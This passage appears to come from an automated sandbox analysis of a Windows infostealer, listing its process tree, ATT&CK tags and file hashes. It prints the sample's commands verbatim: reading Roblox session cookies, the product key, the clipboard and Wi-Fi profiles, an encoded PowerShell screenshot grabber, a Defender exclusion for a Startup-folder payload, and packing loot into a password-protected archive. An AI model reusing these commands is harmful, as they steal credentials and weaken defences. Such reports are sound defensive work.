                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic computersystem get totalphysicalmemory
                                                                                      8⤵
                                                                                        PID:1448
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                      7⤵
                                                                                        PID:2188
                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                          wmic csproduct get uuid
                                                                                          8⤵
                                                                                            PID:5600
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                          7⤵
                                                                                            PID:5552
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                              8⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:4564
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                            7⤵
                                                                                              PID:5512
                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                wmic path win32_VideoController get name
                                                                                                8⤵
                                                                                                • Detects videocard installed
                                                                                                PID:5744
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                              7⤵
                                                                                                PID:3524
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                  8⤵
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:5836
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('windows update failed. hang on it will retry in a bit', 0, 'windows', 32+16);close()""
                                                                                        3⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1300
                                                                                        • C:\Windows\system32\mshta.exe
                                                                                          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('windows update failed. hang on it will retry in a bit', 0, 'windows', 32+16);close()"
                                                                                          4⤵
                                                                                            PID:2516
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍​‍ .scr'"
                                                                                          3⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4524
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍​‍ .scr'
                                                                                            4⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1036
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                          3⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1108
                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                            tasklist /FO LIST
                                                                                            4⤵
                                                                                            • Enumerates processes with tasklist
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3264
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                          3⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3168
                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                            tasklist /FO LIST
                                                                                            4⤵
                                                                                            • Enumerates processes with tasklist
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4664
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                          3⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2140
                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                            4⤵
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4764
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                          3⤵
                                                                                          • Clipboard Data
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2928
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell Get-Clipboard
                                                                                            4⤵
                                                                                            • Clipboard Data
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:5076
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                          3⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3204
                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                            tasklist /FO LIST
                                                                                            4⤵
                                                                                            • Enumerates processes with tasklist
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4848
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                          3⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2384
                                                                                          • C:\Windows\system32\tree.com
                                                                                            tree /A /F
                                                                                            4⤵
                                                                                              PID:2424
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                            3⤵
                                                                                            • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4572
                                                                                            • C:\Windows\system32\netsh.exe
                                                                                              netsh wlan show profile
                                                                                              4⤵
                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                              • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                              PID:4832
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                            3⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4120
                                                                                            • C:\Windows\system32\systeminfo.exe
                                                                                              systeminfo
                                                                                              4⤵
                                                                                              • Gathers system information
                                                                                              PID:4356
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                            3⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2564
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                              4⤵
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:1048
                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b2kffi2p\b2kffi2p.cmdline"
                                                                                                5⤵
                                                                                                  PID:1724
                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99B0.tmp" "c:\Users\Admin\AppData\Local\Temp\b2kffi2p\CSC4C34ADFC662E44CEA4B0783B81F51537.TMP"
                                                                                                    6⤵
                                                                                                      PID:2372
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                3⤵
                                                                                                  PID:4180
                                                                                                  • C:\Windows\system32\tree.com
                                                                                                    tree /A /F
                                                                                                    4⤵
                                                                                                      PID:2900
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                    3⤵
                                                                                                      PID:8
                                                                                                      • C:\Windows\system32\tree.com
                                                                                                        tree /A /F
                                                                                                        4⤵
                                                                                                          PID:2976
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                        3⤵
                                                                                                          PID:3672
                                                                                                          • C:\Windows\system32\tree.com
                                                                                                            tree /A /F
                                                                                                            4⤵
                                                                                                              PID:4612
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                            3⤵
                                                                                                              PID:1976
                                                                                                              • C:\Windows\system32\tree.com
                                                                                                                tree /A /F
                                                                                                                4⤵
                                                                                                                  PID:4176
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                3⤵
                                                                                                                  PID:4668
                                                                                                                  • C:\Windows\system32\tree.com
                                                                                                                    tree /A /F
                                                                                                                    4⤵
                                                                                                                      PID:2160
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                    3⤵
                                                                                                                      PID:1572
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        4⤵
                                                                                                                          PID:4612
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                          4⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3656
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                        3⤵
                                                                                                                          PID:4668
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                            4⤵
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4832
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                          3⤵
                                                                                                                            PID:4520
                                                                                                                            • C:\Windows\system32\getmac.exe
                                                                                                                              getmac
                                                                                                                              4⤵
                                                                                                                                PID:4252
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19202\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\oew0l.zip" *"
                                                                                                                              3⤵
                                                                                                                                PID:1448
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI19202\rar.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\_MEI19202\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\oew0l.zip" *
                                                                                                                                  4⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:4576
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                3⤵
                                                                                                                                  PID:5008
                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                    wmic os get Caption
                                                                                                                                    4⤵
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:1744
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                  3⤵
                                                                                                                                    PID:3972
                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                      wmic computersystem get totalphysicalmemory
                                                                                                                                      4⤵
                                                                                                                                        PID:1288
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                      3⤵
                                                                                                                                        PID:3776
                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                          wmic csproduct get uuid
                                                                                                                                          4⤵
                                                                                                                                            PID:3732
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                          3⤵
                                                                                                                                            PID:1088
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                              4⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:4920
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                            3⤵
                                                                                                                                              PID:2512
                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                wmic path win32_VideoController get name
                                                                                                                                                4⤵
                                                                                                                                                • Detects videocard installed
                                                                                                                                                PID:1140
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                              3⤵
                                                                                                                                                PID:1120
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                  4⤵
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  PID:4464

                                                                                                                                          Network

                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                          Replay Monitor

                                                                                                                                          Loading Replay Monitor...

                                                                                                                                          Downloads

                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                            Filesize

                                                                                                                                            3KB

                                                                                                                                            MD5

                                                                                                                                            8740e7db6a0d290c198447b1f16d5281

                                                                                                                                            SHA1

                                                                                                                                            ab54460bb918f4af8a651317c8b53a8f6bfb70cd

                                                                                                                                            SHA256

                                                                                                                                            f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

                                                                                                                                            SHA512

                                                                                                                                            d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                            Filesize

                                                                                                                                            944B

                                                                                                                                            MD5

                                                                                                                                            3a6bad9528f8e23fb5c77fbd81fa28e8

                                                                                                                                            SHA1

                                                                                                                                            f127317c3bc6407f536c0f0600dcbcf1aabfba36

                                                                                                                                            SHA256

